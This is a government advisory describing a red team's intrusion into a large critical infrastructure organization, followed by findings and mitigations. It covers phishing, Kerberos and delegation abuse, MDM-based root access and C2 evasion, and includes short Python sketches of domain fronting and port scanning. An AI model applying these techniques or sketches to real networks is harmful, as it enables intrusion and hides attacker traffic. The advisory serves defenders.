In 2022, CISA conducted a red team assessment (RTA) at the request of a large critical infrastructure organization with multiple geographically separated sites. The team gained persistent access to the organization’s network, moved laterally across the organization’s multiple geographically separated sites, and eventually gained access to systems adjacent to the organization’s sensitive business systems (SBSs). Multifactor authentication (MFA) prompts prevented the team from achieving access to one SBS, and the team was unable to complete its viable plan to compromise a second SBS within the assessment period.

Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response.

CISA is releasing this CSA detailing the red team’s tactics, techniques, and procedures (TTPs) and key findings to provide network defenders of critical infrastructure organizations proactive steps to reduce the threat of similar activity from malicious cyber actors. This CSA highlights the importance of collecting and monitoring logs for unusual activity as well as continuous testing and exercises to ensure your organization’s environment is not vulnerable to compromise, regardless of the maturity of its cyber posture.

CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA—including conducting regular testing within their security operations center—to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.

Download the PDF version of this report:

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks (PDF, 1.06 MB)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the appendix for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques.

Introduction

CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to Federal and non-Federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6].) After receiving a request for a red team assessment (RTA) from an organization and coordinating some high-level details of the engagement with certain personnel at the organization, CISA conducted the RTA over a three-month period in 2022.

During RTAs, a CISA red team emulates cyber threat actors to assess an organization’s cyber detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network while avoiding detection and evading defenses. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, or technology.

The “victim” for this assessment was a large organization with multiple geographically separated sites throughout the United States. For this assessment, the red team’s goal during Phase I was to gain access to certain sensitive business systems (SBSs).

Phase I: Red Team Cyber Threat Activity
Overview

The organization’s network was segmented with both logical and geographical boundaries. CISA’s red team gained initial access to two organization workstations at separate sites via spearphishing emails. After gaining access and leveraging Active Directory (AD) data, the team gained persistent access to a third host via spearphishing emails. From that host, the team moved laterally to a misconfigured server, from which they compromised the domain controller (DC). They then used forged credentials to move to multiple hosts across different sites in the environment and eventually gained root access to all workstations connected to the organization’s mobile device management (MDM) server. The team used this root access to move laterally to SBS-connected workstations. However, a multifactor authentication (MFA) prompt prevented the team from achieving access to one SBS, and Phase I ended before the team could implement a seemingly viable plan to achieve access to a second SBS.

Initial Access and Active Directory Discovery

The CISA red team gained initial access [TA0001] to two workstations at geographically separated sites (Site 1 and Site 2) via spearphishing emails. The team first conducted open-source research [TA0043] to identify potential targets for spearphishing. Specifically, the team looked for email addresses [T1589.002] as well as names [T1589.003] that could be used to derive email addresses based on the team’s identification of the email naming scheme. The red team sent tailored spearphishing emails to seven targets using commercially available email platforms [T1585.002]. The team used the logging and tracking features of one of the platforms to analyze the organization’s email filtering defenses and confirm the emails had reached the target’s inbox.

The team built a rapport with some targeted individuals through emails, eventually leading these individuals to accept a virtual meeting invite. The meeting invite took them to a red team-controlled domain [T1566.002] with a button, which, when clicked, downloaded a “malicious” ISO file [T1204]. After the download, another button appeared, which, when clicked, executed the file.

Two of the seven targets responded to the phishing attempt, giving the red team access to a workstation at Site 1 (Workstation 1) and a workstation at Site 2. On Workstation 1, the team leveraged a modified SharpHound collector, ldapsearch, and the command-line tool dsquery to query and scrape AD information, including AD users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACLs), organizational units (OUs), and group policy objects (GPOs) [T1615]. Note: SharpHound is a collector for BloodHound, an open-source AD reconnaissance tool. BloodHound has multiple collectors that assist with information querying.

There were 52 hosts in the AD that had Unconstrained Delegation enabled and a lastlogon timestamp within 30 days of the query. Hosts with Unconstrained Delegation enabled store Kerberos ticket-granting tickets (TGTs) of all users that have authenticated to that host. Many of these hosts, including a Site 1 SharePoint server, were Windows Server 2012R2. The default configuration of Windows Server 2012R2 allows unprivileged users to query group membership of local administrator groups.

The red team queried the parsed BloodHound data for members of the SharePoint admin group and identified several standard user accounts with administrative access. The team initiated a second spearphishing campaign, similar to the first, to target these users. One user triggered the red team’s payload, which led to installation of a persistent beacon on the user’s workstation (Workstation 2), giving the team persistent access to Workstation 2.

Lateral Movement, Credential Access, and Persistence

The red team moved laterally [TA0008] from Workstation 2 to the Site 1 SharePoint server and obtained SYSTEM-level access to it; the server had Unconstrained Delegation enabled. They used this access to obtain the cached credentials of all logged-in users, including the New Technology LAN Manager (NTLM) hash for the SharePoint server account. To obtain the credentials, the team took a snapshot of lsass.exe [T1003.001] with a tool called nanodump, exported the output, and processed the output offline with Mimikatz.

The team then exploited the Unconstrained Delegation misconfiguration to steal the DC’s TGT. They ran the DFSCoerce python script (DFSCoerce.py), which prompted DC authentication to the SharePoint server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT [T1550.002], [T1557.001]. (DFSCoerce abuses Microsoft’s Distributed File System [MS-DFSNM] protocol to relay authentication against an arbitrary server.[1])

The team then used the TGT to harvest advanced encryption standard (AES)-256 hashes via DCSync [T1003.006] for the krbtgt account and several privileged accounts—including domain admins, workstation admins, and a system center configuration management (SCCM) service account (SCCM Account 1). The team used the krbtgt account hash throughout the rest of their assessment to perform golden ticket attacks [T1558.001] in which they forged legitimate TGTs. The team also used the asktgt command to impersonate accounts they had credentials for by requesting account TGTs [T1550.003].

The team first impersonated the SCCM Account 1 and moved laterally to a Site 1 SCCM distribution point (DP) server (SCCM Server 1) that had direct network access to Workstation 2. The team then moved from SCCM Server 1 to a central SCCM server (SCCM Server 2) at a third site (Site 3). Specifically, the team:

  1. Queried the AD using Lightweight Directory Access Protocol (LDAP) for information about the network’s sites and subnets [T1016]. This query revealed all organization sites and subnets broken down by classless inter-domain routing (CIDR) subnet and description.
  2. Used LDAP queries and domain name system (DNS) requests to identify recently active hosts.
  3. Listed existing network connections [T1049] on SCCM Server 1, which revealed an active Server Message Block (SMB) connection from SCCM Server 2.
  4. Attempted to move laterally to the SCCM Server 2 via AppDomain hijacking, but the HTTPS beacon failed to call back.
  5. Attempted to move laterally with an SMB beacon [T1021.002], which was successful.

The team also moved from SCCM Server 1 to a Site 1 workstation (Workstation 3) that housed an active server administrator. The team impersonated an administrative service account via a golden ticket attack (from SCCM Server 1); the account had administrative privileges on Workstation 3. The server administrator used a KeePass password manager, which stored credentials in a database file. The red team pulled the decryption key from memory using KeeThief and used it to unlock the database [T1555.005], obtaining passwords for other internal websites, a kernel-based virtual machine (KVM) server, virtual private network (VPN) endpoints, firewalls, and another KeePass database with credentials.

At the organization’s request, the red team confirmed that SCCM Server 2 provided access to the organization’s sites because firewall rules allowed SMB traffic to SCCM servers at all other sites.

The team moved laterally from SCCM Server 2 to an SCCM DP server at Site 5 and from the SCCM Server 1 to hosts at two other sites (Sites 4 and 6). The team installed persistent beacons at each of these sites. Site 5 was broken into a private and a public subnet and only DCs were able to cross that boundary. To move between the subnets, the team moved through DCs. Specifically, the team moved from the Site 5 SCCM DP server to a public DC; and then they moved from the public DC to the private DC. The team was then able to move from the private DC to workstations in the private subnet.

The team leveraged access available from SCCM Server 2 to move around the organization’s network for post-exploitation activities (see the Post-Exploitation Activity section).

See Figure 1 for a timeline of the red team’s initial access and lateral movement showing key access points.

Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement

While traversing the network, the team varied their lateral movement techniques to evade detection and because the organization had non-uniform firewalls between the sites and within the sites (within the sites, firewalls were configured by subnet). The team’s primary methods to move between sites were AppDomainManager hijacking and dynamic-link library (DLL) hijacking [T1574.001]. In some instances, they used Windows Management Instrumentation (WMI) Event Subscriptions [T1546.003].

The team impersonated several accounts to evade detection while moving. When possible, the team remotely enumerated the local administrators group on target hosts to find a valid user account. This technique relies on anonymous SMB pipe binds [T1071], which are disabled by default starting with Windows Server 2016. In other cases, the team attempted to determine valid accounts based on group name and purpose. If the team had previously acquired the credentials, they used asktgt to impersonate the account. If the team did not have the credentials, they used the golden ticket attack to forge the account.

Post-Exploitation Activity: Gaining Access to SBSs

With persistent, deep access established across the organization’s networks and subnetworks, the red team began post-exploitation activities and attempted to access SBSs. Trusted agents of the organization tasked the team with gaining access to two specialized servers (SBS 1 and SBS 2). The team achieved root access to three SBS-adjacent workstations but was unable to move laterally to the SBS servers:

  • Phase I ended before the team could implement a plan to move to SBS 1.
  • An MFA prompt blocked the team from moving to SBS 2, and Phase I ended before they could implement potential workarounds.

However, the team assesses that by using Secure Shell (SSH) session socket files (see below), they could have accessed any hosts available to the users whose workstations were compromised.

Plan for Potential Access to SBS 1

Conducting open-source research [T1591.001], the team identified that SBS 1 and SBS 2 assets and associated management/upkeep staff were located at Sites 5 and 6, respectively. Adding previously collected AD data to this discovery, the team was able to identify a specific SBS 1 admin account. The team planned to use the organization’s mobile device management (MDM) software to move laterally to the SBS 1 administrator’s workstation and, from there, pivot to SBS 1 assets.

The team identified the organization’s MDM vendor using open-source and AD information [T1590.006] and moved laterally to an MDM distribution point server at Site 5 (MDM DP 1). This server contained backups of the MDM MySQL database on its D: drive in the Backup directory. The backups included the encryption key needed to decrypt any encrypted values, such as SSH passwords [T1552]. The database backup identified both the user of the SBS 1 administrator account (USER 2) and the user’s workstation (Workstation 4), which the MDM software remotely administered.

The team moved laterally to an MDM server (MDM 1) at Site 3, searched files on the server, and found plaintext credentials [T1552.001] to an application programming interface (API) user account stored in PowerShell scripts. The team attempted to leverage these credentials to browse to the web login page of the MDM vendor but were unable to do so because the website directed to an organization-controlled single-sign on (SSO) authentication page.

The team gained root access to workstations connected to MDM 1—specifically, the team accessed Workstation 4—by:

  1. Selecting an MDM user from the plaintext credentials in PowerShell scripts on MDM 1.
  2. While in the MDM MySQL database,
    • Elevating the selected MDM user’s account privileges to administrator privileges, and
    • Modifying the user’s account by adding Create Policy and Delete Policy permissions [T1098], [T1548].
  3. Creating a policy via the MDM API [T1106], which instructed Workstation 4 to download and execute a payload to give the team interactive access as root to the workstation.
  4. Verifying their interactive access.
  5. Resetting permissions back to their original state by removing the policy via the MDM API and removing the Create Policy, Delete Policy, and administrator permissions from the MDM user’s account.

While interacting with Workstation 4, the team found an open SSH socket file and a corresponding netstat connection to a host that the team identified as a bastion host from architecture documentation found on Workstation 4. The team planned to move from Workstation 4 to the bastion host and then to SBS 1. Note: An SSH socket file allows a user to open multiple SSH sessions through a single, already authenticated SSH connection without additional authentication.

The team could not take advantage of the open SSH socket. Instead, they searched through SBS 1 architecture diagrams and documentation on Workstation 4. They found a security operations (SecOps) network diagram detailing the network boundaries between Site 5 SecOps on-premises systems, Site 5 non-SecOps on-premises systems, and Site 5 SecOps cloud infrastructure. The documentation listed the SecOps cloud infrastructure IP ranges [T1580]. These “trusted” IP addresses were a public /16 subnet; the team was able to request a public IP in that range from the same cloud provider, and Workstation 4 made successful outbound SSH connections to this cloud infrastructure. The team intended to use that connection to reverse tunnel traffic back to the workstation and then access the bastion host via the open SSH socket file. However, Phase I ended before they were able to implement this plan.

Attempts to Access SBS 2

Conducting open-source research, the team identified an organizational branch [T1591] that likely had access to SBS 2. The team queried the AD to identify the branch’s users and administrators. The team gathered a list of potential accounts, from which they identified administrators, such as SYSTEMS ADMIN or DATA SYSTEMS ADMINISTRATOR, with technical roles. Using their access to the MDM MySQL database, the team queried potential targets to (1) determine the target’s last contact time with the MDM and (2) ensure any policy targeting the target’s workstation would run relatively quickly [T1596.005]. Using the same methodology as described by the steps in the Plan for Potential Access to SBS 1 section above, the team gained interactive root access to two Site 6 SBS 2-connected workstations: a software engineering workstation (Workstation 5) and a user administrator workstation (Workstation 6).

The Workstation 5 user's bash history files contained what appeared to be SSH passwords mistyped into the bash prompt and thus saved to the history file [T1552.003]. The team then attempted to authenticate to SBS 2 using a similar tunnel setup as described in the Access to SBS 1 section above and the potential credentials from the user's bash history file. However, this attempt was unsuccessful for unknown reasons.

On Workstation 6, the team found a .txt file containing plaintext credentials for the user. Using the pattern discovered in these credentials, the team was able to crack the user’s workstation account password [T1110.002]. The team also discovered potential passwords and SSH connection commands in the user’s bash history. Using a similar tunnel setup described above, the team attempted to log into SBS 2. However, a prompt for an MFA passcode blocked this attempt.

See figure 2 for a timeline of the team’s post exploitation activity that includes key points of access.

Figure 2: Red Team Cyber Threat Activity: Post Exploitation
Command and Control

The team used third-party owned and operated infrastructure and services [T1583] throughout their assessment, including in certain cases for command and control (C2) [TA0011]. These included:

  • Cobalt Strike and Merlin payloads for C2 throughout the assessment. Note: Merlin is a post-exploit tool that leverages HTTP protocols for C2 traffic.
    • The team maintained multiple Cobalt Strike servers hosted by a cloud vendor. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data.
  • Two commercially available cloud-computing platforms.
    • The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team's Cobalt Strike servers [T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors used HTTPS reverse proxies to redirect C2 traffic between the target organization's network and the Cobalt Strike team servers [T1071.002]. The team encrypted all data in transit [T1573] using encryption keys stored on the team's Cobalt Strike servers.
  • A cloud service to rapidly change the IP address of the team’s redirecting servers in the event of detection and eradication.
  • Content delivery network (CDN) services to further obfuscate some of the team’s C2 traffic.
    • This technique leverages CDNs associated with high-reputation domains so that the malicious traffic appears to be directed towards a high-reputation domain but is actually redirected to the red team-controlled Cobalt Strike servers.
    • The team used domain fronting [T1090.004] to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating. This technique, which also leverages CDNs, allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team's redirect server. (A minimal sketch of this pattern follows the list.)
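The sketch below shows the basic domain-fronting pattern described in the last bullet: the TLS connection is made to a high-reputation, CDN-hosted domain, while the HTTP Host header names the fronted redirector. The domain names are placeholders, and many CDNs now reject such mismatched SNI/Host pairs.

    # Domain-fronting illustration (placeholder domains only).
    import requests

    resp = requests.get(
        "https://high-reputation.example/",              # what network defenders see (DNS / TLS SNI)
        headers={"Host": "fronted-redirector.example"},  # where the CDN actually routes the request
        timeout=30,
    )
    print(resp.status_code)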
Phase II: Red Team Measurable Events Activity

The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization's network. See Table 1 for a description of the events, the expected network defender activity, and the organization's actual response. (A minimal sketch of the first event, the internal port scan, appears after the table.)

Measurable Event | Description | MITRE ATT&CK Technique(s) | Expected Detection Points | Expected Network Defender Reactions | Reported Reactions
Internal Port Scan | Launch scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s). | Network Service Discovery [T1046] | Network Monitoring and Analysis Tools; Intrusion Detection or Prevention Systems; Endpoint Protection Platform | Detect target hosts and ports; Identify associated scanning process; Analyze scanning host once detected; Develop response plan | None
Comprehensive Active Directory and Host Enumeration | Perform AD enumeration by querying all domain objects from the DC and enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer (Workstation and Server). | Domain Trust Discovery [T1482]; Account Discovery: Domain Account [T1087.002]; System Owner/User Discovery [T1033]; Remote System Discovery [T1018] | Network Monitoring and Analysis Tools; Intrusion Detection or Prevention Systems; Endpoint Protection Platform | Detect target hosts and ports; Identify associated scanning process; Analyze scanning host once detected; Develop response plan | Collection process stopped before completion. Host isolated and sent for forensics.
Data Exfiltration—1 GB of Data | Send a large amount (1 GB) of mock sensitive information to an external system over various protocols, including ICMP, DNS, FTP, and/or HTTP/S. | Exfiltration Over Alternative Protocol [T1048] | Network Monitoring and Analysis Tools; Intrusion Detection or Prevention Systems; Endpoint Protection Platform | Detect target hosts and ports; Identify associated scanning process; Analyze scanning host once detected; Develop response plan | None
Malicious Traffic Generation—Workstation to External Host | Establish a session that originates from a target Workstation system directly to an external host over a clear text protocol, such as HTTP. | Application Layer Protocol [T1071] | Intrusion Detection or Prevention Systems; Endpoint Protection Platform; Windows Event Logs | Detect and identify source IP and source process of enumeration; Analyze scanning host once detected; Develop response plan | None
Active Directory Account Lockout | Lock out several administrative AD accounts. | Account Access Removal [T1531] | Windows Event Logs; End User Reporting | Detect and identify source IP and source process of exfiltration; Analyze host used for exfiltration once detected; Develop response plan | None
Local Admin User Account Creation (workstation) | Create a local administrator account on a target workstation system. | Create Account: Local Account [T1136.001]; Account Manipulation [T1098] | Intrusion Detection or Prevention Systems; Endpoint Protection Platform; Web Proxy Logs | Detect and identify source IP and source process of malicious traffic; Investigate destination IP address; Triage compromised host; Develop response plan | None
Local Admin User Account Creation (server) | Create a local administrator account on a target server system. | Create Account: Local Account [T1136.001]; Account Manipulation [T1098] | Windows Event Logs | Detect account creation; Identify source of change; Verify change with system owner; Develop response plan | None
Active Directory Account Creation | Create AD accounts and add them to the domain admins group. | Create Account: Domain Account [T1136.002]; Account Manipulation [T1098] | Windows Event Logs | Detect account creation; Identify source of change; Verify change with system owner; Develop response plan | None
Workstation Admin Lateral Movement—Workstation to Workstation | Use a previously compromised workstation admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on several target Workstations. | Valid Accounts: Domain Accounts [T1078.002]; Remote Services: SMB/Windows Admin Shares [T1021.002]; Create or Modify System Process: Windows Service [T1543.003] | Windows Event Logs | Detect account compromise; Analyze compromised host; Develop response plan | None
Domain Admin Lateral Movement—Workstation to Domain Controller | Use a previously compromised domain admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on a target DC. | Valid Accounts: Domain Accounts [T1078.002]; Remote Services: SMB/Windows Admin Shares [T1021.002]; Create or Modify System Process: Windows Service [T1543.003] | Windows Event Logs | Detect account compromise; Triage compromised host; Develop response plan | None
Malicious Traffic Generation—Domain Controller to External Host | Establish a session that originates from a target Domain Controller system directly to an external host over a clear text protocol, such as HTTP. | Application Layer Protocol [T1071] | Intrusion Detection or Prevention Systems; Endpoint Protection Platform; Web Proxy Logs | Detect and identify source IP and source process of malicious traffic; Investigate destination IP address; Triage compromised host; Develop response plan | None
Trigger Host-Based Protection—Domain Controller | Upload and execute a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts. | Ingress Tool Transfer [T1105] | Endpoint Protection Platform; Endpoint Detection and Response | Detect and identify source IP and source process of malicious traffic; Investigate destination IP address; Triage compromised host; Develop response plan | Malicious file was removed by antivirus
Ransomware Simulation | Execute simulated ransomware on multiple Workstation systems to simulate a ransomware attack. Note: This technique does NOT encrypt files on the target system. | N/A | End User Reporting | Investigate end user reported event; Triage compromised host; Develop response plan | Four users reported event to defensive staff
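As an illustration of the first measurable event, the sketch below performs a simple TCP connect scan of a handful of common Windows service ports; the target address and port list are placeholders.

    # Minimal internal port-scan sketch (measurable event 1). Target and ports are placeholders.
    import socket

    target = "10.0.0.5"
    ports = [88, 135, 139, 389, 445, 3389]

    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            if s.connect_ex((target, port)) == 0:   # 0 means the TCP handshake succeeded
                print(f"{target}:{port} open")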
Findings
Key Issues

The red team noted the following key issues relevant to the security of the organization’s network. These findings contributed to the team’s ability to gain persistent, undetected access across the organization’s sites. See the Mitigations section for recommendations on how to mitigate these issues.

  • Insufficient host and network monitoring. Most of the red team’s Phase II actions failed to provoke a response from the people, processes, and technology defending the organization’s network. The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs. Additionally, throughout Phase I, the team received no deconflictions or confirmation that the organization caught their activity. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection:
    • Phishing
    • Lateral movement reuse
    • Generation and use of the golden ticket
    • Anomalous LDAP traffic
    • Anomalous internal share enumeration
    • Unconstrained Delegation server compromise
    • DCSync
    • Anomalous account usage during lateral movement
    • Anomalous outbound network traffic
    • Anomalous outbound SSH connections to the team’s cloud servers from workstations
  • Lack of monitoring on endpoint management systems. The team used the organization’s MDM system to gain root access to machines across the organization’s network without being detected. Endpoint management systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
  • KRBTGT never changed. The Site 1 krbtgt account password had not been updated for over a decade. The krbtgt account is a domain default account that acts as a service account for the key distribution center (KDC) service used to encrypt and sign all Kerberos tickets for the domain. Compromise of the krbtgt account could provide adversaries with the ability to sign their own TGTs, facilitating domain access years after the date of compromise. The red team was able to use the krbtgt account to forge TGTs for multiple accounts throughout Phase I.
  • Excessive permissions to standard users. The team discovered several standard user accounts that have local administrator access to critical servers. This misconfiguration allowed the team to use the low-level access of a phished user to move laterally to an Unconstrained Delegation host and compromise the entire domain.
  • Hosts with Unconstrained Delegation enabled unnecessarily. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of all users that authenticate to that host, enabling actors to steal service tickets or compromise krbtgt accounts and perform golden ticket or “silver ticket” attacks. The team performed an NTLM-relay attack to obtain the DC’s TGT, followed by a golden ticket attack on a SharePoint server with Unconstrained Delegation to gain the ability to impersonate any Site 1 AD account.
  • Use of non-secure default configurations. The organization used default configurations for hosts with Windows Server 2012 R2. The default configuration allows unprivileged users to query group membership of local administrator groups. The red team identified and used several standard user accounts with administrative access from a Windows Server 2012 R2 SharePoint server.
Additional Issues

The team noted the following additional issues.

  • Ineffective separation of privileged accounts. Some workstations allowed unprivileged accounts to have local administrator access; for example, the red team discovered an ordinary user account in the local admin group for the SharePoint server. If a user with administrative access is compromised, an actor can access servers without needing to elevate privileges. Administrative and user accounts should be separated, and designated admin accounts should be exclusively used for admin purposes.
  • Lack of server egress control. Most servers, including domain controllers, allowed unrestricted egress traffic to the internet.
  • Inconsistent host configuration. The team observed inconsistencies on servers and workstations within the domain, including inconsistent membership in the local administrator group among different servers or workstations. For example, some workstations had “Server Admins” or “Domain Admins” as local administrators, and other workstations had neither.
  • Potentially unwanted programs. The team noticed potentially unusual software, including music software, installed on both workstations and servers. These extraneous software installations indicate inconsistent host configuration (see above) and increase the attack surfaces for malicious actors to gain initial access or escalate privileges once in the network.
  • Mandatory password changes enabled. During the assessment, the team keylogged a user during a mandatory password change and noticed that only the final character of their password was modified. This is potentially due to domain passwords being required to be changed every 60 days.
  • Smart card use was inconsistent across the domain. While the technology was deployed, it was not applied uniformly, and there was a significant portion of users without smartcard protections enabled. The team used these unprotected accounts throughout their assessment to move laterally through the domain and gain persistence.
Noted Strengths

The red team noted the following technical controls or defensive measures that prevented or hampered offensive actions:

  • The organization conducts regular, proactive penetration tests and adversarial assessments and invests in hardening their network based on findings.
    • The team was unable to discover any easily exploitable services, ports, or web interfaces from more than three million external in-scope IPs. This forced the team to resort to phishing to gain initial access to the environment.
    • Service account passwords were strong. The team was unable to crack any of the hashes obtained from the 610 service accounts pulled. This is a critical strength because it slowed the team's movement around the network in the initial parts of Phase I.
    • The team did not discover any useful credentials on open file shares or file servers. This further slowed the team's movement around the network.
  • MFA was used for some SBSs. The team was blocked from moving to SBS 2 by an MFA prompt.
  • There were strong security controls and segmentation for SBS systems. SBS systems were located on separate networks, and SBS administrators used workstations protected by local firewalls.

MITIGATIONS

CISA recommends organizations implement the recommendations in Table 2 to mitigate the issues listed in the Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Issue: Insufficient host and network monitoring
Recommendations:
  • Establish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior [CPG 3.1]. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques.
  • Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report.
  • From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts. Consider who is accessing what (what resource), from where (what internal host or external location), and when (what day and time the access occurs). Look for access behavior that deviates from expected or is indicative of AD abuse.
  • Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PSExec, and WMI, which are often used by malicious actors. CISA recommends selecting one tool to administer the network, ensuring logging is turned on [CPG 3.1], and disabling the others.
  • Consider using "honeypot" service principal names (SPNs) to detect attempts to crack account hashes [CPG 1.1].
  • Conduct regular assessments to ensure processes and procedures are up to date and can be followed by security staff and end users.
  • Consider using red team tools, such as SharpHound, for AD enumeration to identify users with excessive privileges and misconfigured hosts (e.g., with Unconstrained Delegation enabled).
  • Ensure all commercial tools deployed in your environment are regularly tuned to pick up on relevant activity in your environment.

Issue: Lack of monitoring on endpoint management systems
Recommendation: Treat endpoint management systems as HVAs with additional restrictions and monitoring because they provide elevated access to thousands of hosts.

Issue: KRBTGT never changed
Recommendation: Change the krbtgt account password on a regular schedule such as every 6 to 12 months or if it becomes compromised. Note that this password change must be carefully performed to effectively change the credential without breaking AD functionality. The password must be changed twice to effectively invalidate the old credentials. However, the required waiting period between resets must be greater than the maximum lifetime period of Kerberos tickets, which is 10 hours by default. See Microsoft's KRBTGT account maintenance considerations guidance for more information. (A minimal audit sketch for checking the krbtgt password age follows this table.)

Issue: Excessive permissions to standard users and ineffective separation of privileged accounts
Recommendations: Implement the principle of least privilege:
  • Grant standard user rights for standard user tasks such as email, web browsing, and using line-of-business (LOB) applications.
  • Periodically audit standard accounts and minimize where they have privileged access.
  • Periodically audit AD permissions to ensure users do not have excessive permissions and have not been added to admin groups.
  • Evaluate which administrative groups should administer which servers/workstations. Ensure group members use administrative accounts instead of standard accounts.
  • Separate administrator accounts from user accounts [CPG 1.5]. Only allow designated admin accounts to be used for admin purposes. If an individual user needs administrative rights over their workstation, use a separate account that does not have administrative access to other hosts, such as servers.
  • Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources [CPG 3.4]. PAM solutions can also log and alert on usage to detect unusual activity and may have helped stop the red team from accessing resources with admin accounts. Note: password vaults associated with PAM solutions should be treated as HVAs with additional restrictions and monitoring (see below).
  • Configure time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege, as well as the Zero Trust model. This is a process in which a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When individual users need the account, they submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.

Issue: Hosts with Unconstrained Delegation enabled
Recommendations:
  • Remove Unconstrained Delegation from all servers. If Unconstrained Delegation functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., constrained delegation) or explore whether systems can be retired or further isolated from the enterprise. CISA recommends Windows Server 2019 or greater.
  • Consider disabling or limiting NTLM and WDigest Authentication if possible, including using their use as a criterion for prioritizing updates to legacy systems or for segmenting the network. Instead, use more modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 bit encryption [CPG 3.4].
  • If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent some NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks [CPG 3.4]. See Microsoft Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Microsoft Overview of Server Message Block signing for more information.

Issue: Use of non-secure default configurations
Recommendation: Keep systems and software up to date [CPG 5.1]. If updates cannot be uniformly installed, update insecure configurations to meet updated standards.

Issue: Lack of server egress control
Recommendation: Configure internal firewalls and proxies to restrict internet traffic from hosts that do not require it. If a host requires specific outbound traffic, consider creating an allowlist policy of domains.

Issue: Large number of credentials in a shared vault
Recommendation: Treat password vaults as HVAs with additional restrictions and monitoring [CPG 3.4]:
  • If on-premises, require MFA for admin access and apply network segmentation [CPG 1.3]. Use solutions with end-to-end encryption where applicable [CPG 3.3].
  • If cloud-based, evaluate the provider to ensure use of strong security controls such as MFA and end-to-end encryption [CPG 1.3, 3.3].

Issue: Inconsistent host configuration
Recommendation: Establish a baseline/gold-image for workstations and servers and deploy from that image [CPG 2.5]. Use standardized groups to administer hosts in the network.

Issue: Potentially unwanted programs
Recommendation: Implement software allowlisting to ensure users can only install software from an approved list [CPG 2.1]. Remove unnecessary, extraneous software from servers and workstations.

Issue: Mandatory password changes enabled
Recommendation: Consider only requiring changes for memorized passwords in the event of compromise. Regular changing of memorized passwords can lead to predictable patterns, and both CISA and the National Institute of Standards and Technology (NIST) recommend against changing passwords on regular intervals.
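Tying back to the krbtgt recommendation above, the sketch below (assuming the third-party ldap3 package, with placeholder domain names and bind credentials) reads the krbtgt account's pwdLastSet attribute and reports how long ago the password was last rotated.

    # Sketch: report the age of the krbtgt password. Host, credentials, and base DN are placeholders.
    from datetime import datetime, timedelta, timezone
    from ldap3 import Server, Connection, NTLM, ALL

    server = Server("dc01.example.local", get_info=ALL)
    conn = Connection(server, user="EXAMPLE\\auditor", password="<password>",
                      authentication=NTLM, auto_bind=True)

    conn.search("DC=example,DC=local", "(sAMAccountName=krbtgt)", attributes=["pwdLastSet"])
    raw = int(conn.entries[0]["pwdLastSet"].raw_values[0])   # Windows FILETIME: 100-ns ticks since 1601
    last_set = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=raw // 10)
    age_days = (datetime.now(timezone.utc) - last_set).days
    print(f"krbtgt password last set {last_set:%Y-%m-%d} ({age_days} days ago)")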

Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture:

  • Provide users with regular training and exercises, specifically related to phishing emails [CPG 4.3]. Phishing accounts for the majority of initial access intrusion events.
  • Enforce phishing-resistant MFA to the greatest extent possible [CPG 1.3].
  • Reduce the risk of credential compromise via the following:
    • Place domain admin accounts in the protected users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM.
